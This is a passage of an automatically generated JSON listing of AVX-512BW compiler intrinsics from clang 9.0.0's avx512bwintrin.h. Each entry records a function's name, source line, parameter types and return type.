"__m512i" } }, { "tag": "function", "name": "_mm512_maskz_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1153:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1165:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1172:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1179:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1193:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1221:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1228:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1235:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1242:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1248:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1260:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1281:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1288:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1295:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1308:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1315:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1322:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1343:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1357:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1370:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1377:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1384:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1392:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1408:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1414:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1422:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1463:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1469:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1477:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1491:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1499:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1507:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1513:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1521:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1538:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1546:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1554:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1560:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1568:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1576:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1582:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1590:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1598:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1604:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1612:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1620:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1626:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1634:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1642:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1648:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1656:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mov_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1667:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mov_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1675:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mov_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1683:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mov_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1691:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1699:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1707:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_kunpackd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1715:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_kunpackw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1722:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": 